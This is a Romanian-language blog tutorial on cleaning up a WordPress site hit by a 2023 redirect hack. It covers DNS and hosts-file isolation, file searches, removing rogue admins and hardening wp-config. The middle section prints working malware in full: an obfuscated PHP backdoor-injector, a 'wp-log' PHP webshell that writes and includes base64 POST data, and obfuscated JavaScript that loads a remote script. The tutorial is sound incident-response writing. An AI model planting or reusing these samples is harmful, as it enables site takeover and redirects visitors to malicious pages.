WordPress este cu siguranță cea mai utilizată platformă CMS (Content Management System) atât pentru bloguri cât și pentru magazine online starter (cu modulul WooCommerce), ceea ce o face să fie și cea mai vizată de atacuri informatice (hacking). Una dintre cele mai utilizate operațiuni de hacking are drept obiectiv redirectionarea website-ului compromis către alte pagini web. Redirect WordPress Hack 2023 este un malware relativ nou care are ca impact redirectionarea intregului site catre pagini web de spam sau care la rândul lor pot virusa calculatoarele utilizatorilor.
Dacă site-ul tău dezvoltat pe WordPress este redirectionat pe un alt site, atunci cel mai probabil este victima deja celebrului redirect hack.
În acest tutorial o să găsești informațiile necesare și sfaturile utile prin care poți să devirusezi un website infectat cu redirect WordPress Hack (Virus Redirect). Prin intermediul comentariilor poți obține informații suplimentare sau cere ajutor.
Cuprins
Detectarea virusului care redirectioneaza site-urile WordPress
Scăderea bruscă și nejustificată a traficului pe site, scăderea numărului de comenzi (în cazul magazinelor online) sau a încasărilor din publicitate sunt primele semne că ceva nu este în regulă. Detectarea “Redirect WordPress Hack 2023” (Virus Redirect) se poate face și “vizual” atunci când deschizi website-ul și ești redirecționat către o altă pagină web.
Din experiență, majoritatea aplicațiilor malware pentru web sunt compatibile cu internet browserele: Chrome, Firefox, Edge, Opera. Dacă ești utilizator de calculatoare Mac, acești viruși nu prea sunt vizibili în browserul Safari. Sistemul de securitate din Safari blocheaza tacit aceste scripturi malițioase.
Ce trebuie să faci dacă ai un website virusat cu Redirect WordPress Hack
Sper ca prima măsură nu este să vă panicați sau să stergeți website-ul. Nici măcar fișierele virusate sau cele ale virusului nu trebuie șterse în primă fază. Acestea conțin informații valoroase care vă pot ajuta să înțelegeți unde este breșa de securitate și ce a afectat virusul. Modus operandi.
Închide website-ul pentru public.
Cum închizi un website virusat pentru vizitatori? Cel mai simplu este să te folosești de managerul DNS și să-i stergi IP-ul pentru “A” (numele de domeniu) sau să-i definești un IP inexistent. Astfel, vizitatorii website-ului vor fi protejați de acest redirect WordPress hack care-i poate duce pe pagini web virusate sau de SPAM.
Dacă folosești CloudFlare drept DNS manager, te autentifici în cont și ștergi înregistrările DNS “A” pentru numele de domeniu. Astfel domeniul afectat de virus va rămâne fără IP, nemaiputând să fie accesat din internet.
Copiezi IP-ul website-ului și faci “route” pentru a-l putea accesa numai tu. De la calculatorul tău.
Cum schimbi IP-ul real al unui website pe calculatoarele Windows?
Metoda este adesea folosită pentru a bloca accesul la anumie website-uri prin editarea fișierului “hosts”.
1. Deschizi Notepad sau alt editor text (cu drepturi administrator) și editezi fișierul “hosts“. Acesta este localizat în :
C:\Windows\System32\drivers\etc\hosts2. În fișierul “hosts” adaugi “route” catre IP-ul real al website-ului tău. IP-ul șters mai sus din DNS manager.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld3. Salvezi fișierul și accesezi website-ul în browser.
În cazul în care website-ul nu se deschide și nu ai greșit nimic în fișierul “hosts”, cel mai probabil este un cache DNS.
Pentru a șterge cache-ul DNS pe un sistem de operare Windows, deschide Command Prompt, unde execuți comanda:
ipconfig /flushdnsCum schimbi IP-ul real al unui website pe calculatoarele Mac / MacBook?
Pentru utilizatorii de calculatoare Mac este ceva mai simplu să schimbe IP-ul real al unui website.
1. Deschideți utilitarul Terminal.
2. Executați linia de comandă (necesită parola de sistem pentru executare):
sudo nano /etc/hosts3. La fel ca și pentru calculatoarele Windows, adăugați IP-ul real al domeniului.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld4. Salvați modifiările. Ctrl+X (y).
După ce ai făcut “route”, ești singura persoană care poate accesa website-ul virusat cu Redirect WordPress Hack.
Full backup website – Fișiere și bază de date
Chiar dacă este virusat cu “redirect WordPress hack”, recomandarea este să faci un backup general a întregului website. Fișiere și bază de date. Eventual ai putea să salvezi și o copie locală atât a fișierelor din public / public_html cât și a bazei de date.
Identificarea fișierelor virususate și a celor modificate de Redirect WordPress Hack 2023
Principalele fișere țintă ale WordPress sunt index.php (în rădăcină), header.php, index.php și footer.php ale temei WordPress active. Verifici manual aceste fișiere și identifici cod malicios sau un script de tip malware.
În 2023, un virus de tip “Redirect WordPress Hack” a pus în index.php un cod de forma:
(Nu vă recomand să executați aceste coduri!)
<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20=' TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>Decodat, acest script malware este practic consecința virusării website-ului WordPress. Nu este scriptul care stă la baza aplicației malware, ci este scriptul care face posibilă redirectionarea paginii web virusate. Dacă decodăm scriptul de mai sus, obținem:
<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
Ca să indetificați toate fișierele de pe server care conțin acest cod, este bine să aveți acces SSH la server pentru a rula linii de comandă de verificare și administrare fișiere pe Linux.
Related: Cum descoperiti daca aveti blogul virusat sau nu, cu ajutorul Google Search . (WordPress Virus)
Mai jos sunt două comenzi care cu siguranță sunt de ajutor pentru a indentifica fisierele modificate recent și fisierele care contin un anumit cod (string).
Cum vezi pe Linux fișierele PHP modificate în ultimile 24 de ore sau într-un alt interval de timp?
Comanda “find” este foarte simplă de utilizat și permite personalizare pentru a seta perioada de timp, path-ul în care se face căutarea și tipul fișierelor.
find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"În output o să primești informații despre data și ora la care a fost modificat fișierul, permisunile de scriere / citire / executie (chmod) și cărui grup / user aparține.
Dacă vrei să verifici cu mai multe zile în urmă, schimbă valoarea “-mtime -1” sau folosește “-mmin -360” pentru minute (6 ore).
Cum cauți un cod (string) în interiorul fișierelor PHP, Java?
Linia de comandă “find” prin care poți să găsești rapid toate fișierele PHP sau Java care conțin un anumit cod este următoarea:
find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +Comanda va căuta și va afișa fișierele .php și .js care conțin “uJjBRODYsU“.
Cu ajutorul celor două comenzi de mai sus vei afla foarte ușor care fișiere au fost modificate în ultima perioadă și care conțin cod malware.
Elimină codul malware din fișierele modificate fără a compromite codul corect. În scenariul meu, codul malware era plasat înaintea deschiderii <head>.
La executarea primei comenzi “find” este foarte posibil să descoperi și noi fișiere pe server, care nu sunt ale WordPress și nici puse acolo de tine. Fișiere care aprțin virusului de tip Redirect WordPress Hack.
În scenariul investigat de mine, au apărut pe server fișiere de forma “wp-log-nOXdgD.php“. Acestea sunt fișiere “generatoare” care de asemenea conțin cod malware utilizat de virusul pentru redirecționare.
<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}Scopul fișierelor de tip “wp-log-*” este acela de a răspândi virusul hack redirect și la alte website-uri găzduite pe server. Este un cod malware de tip “webshell” compus dintr-o secțiune de bază (în care sunt definite câteva variabile criptate) și o secțiune de execuție prin care atacatorul încearcă să încarce și să execute un cod malware în sistem.
Dacă există o variabilă POST numită ‘bh‘ și valoarea sa criptată MD5 este egală cu “8f1f964a4b4d8d1ac3f0386693d28d03“, atunci scriptul pare să scrie conținutul criptat base64 al unei alte variabile numită ‘b3‘ într-un fișier temporar și apoi încearcă să includă acest fișier temporar.
În cazul în care există o variabilă POST sau GET numită ‘tick‘, scriptul va răspunde cu valoarea MD5 a șirului “885“.
Ca să identifici toate fișierele de pe server care conțin acest cod, alege un string care este comun, apoi execută comanda de “find” (similară celei de mai sus). Șterge toate fișierele care conțin acest cod malware.
Breșa de securitate exploatată de Redirect WordPress Hack
Cel mai probabil acest virus de redirect ajunge prin exploatarea user-ului de administrare WordPress sau prin identificarea unui plugin vulnerabil care permite adăugarea de utilizatori cu privilegii de administrator.
Pentru cele mai multe website-uri construite pe platforma WordPress este posibilă editarea fișierelor temelor sau plugin-urilor din interfața de administrare (Dashboard). Astfel, o persoană rău intenționată poate adăuga in fișierele temei coduri malware care să genereze scripturile prezentate mai sus.
Un exemplu de astfel de cod malware este acesta:
<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>JavaScript identificat în header-ul temei WordPress, imediat după deschiderea etichetei <head>.
Este destul de dificil de decriptat acest JavaScript, însă este evident ca interogheză o altă adresă web de unde cel mai probabil aduce alte scripturi pentru a crea fișierele “wp-log-*” despre care am vorbit mai sus.
Caută și șterge acest cod din toate fișierele PHP afectate.
Din câte am putut să-mi dau seama, acest cod a fost adăugat manual de un nou user cu priviliegii administrative.
Așadar, ca să previi adăugarea de coduri malware din Dashboard, cel mai bine este să dezactivezi opțiunea de editare a WordPress Themes / Plugins din Dashboard.
Editează fișierul wp-config.php și adaugă liniile:
define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);După ce ai făcut această modificare, niciun utilizator WordPress nu va mai putea edita fișiere din Dashboard.
Verifică utilizatorii cu rol de Administrator
Mai jos este o interogare SQL pe care o poți folosi pentru a căuta utilizatorii cu rol de administrator în platforma WordPress:
SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'Această interogare va returna toți utilizatorii din tabelul wp_users care au atribuit rolul de administrator. Interogarea se face și pentru tabelul wp_usermeta pentru a căuta în meta ‘wp_capabilities‘, care conține informații despre rolurile utilizatorilor.
O altă metodă este să-i identifici din: Dashboard → Users → All Users → Administrator. Sun însă practici prin care un utilizator poate fi ascuns în panoul Dashboard. Așadar, cea mai bună metodă sa vezi userii “Administrator” din WordPress este comanda SQL de mai sus.
În cazul meu, am identificat în baza de date user-ul cu numele “wp-import-user“. Destul de sugestiv.
Tot de aici poți să vezi data și ora la care user-ul WordPress a fost creat. ID-ul user-ului este de asemenea foarte important pentru ca căuta în log-urile de server. Astfel poți să vezi toată activitatea acestui user.
Ștergi utilizatorii cu rol de administrator pe care nu-i cunoști, apoi schimbi parolele la toți utilizatorii administrativi. Editor, Author, Administrator.
Schimbi parola user-ului SQL la baza de date a website-ului afectat.
După ce ai făcut acești pași, website-ul poate fi repornit pentru toți utilizatorii.
Reține totuși că ce am prezentat mai sus este unul dintre poate miile de șcenarii prin care un website este virusat cu Redirect WordPress Hack în 2023.
Dacă website-ul tău a fost virusat și ai nevoie de ajutor sau dacă ai nelămuriri, rubrica de comentarii este deschisă.
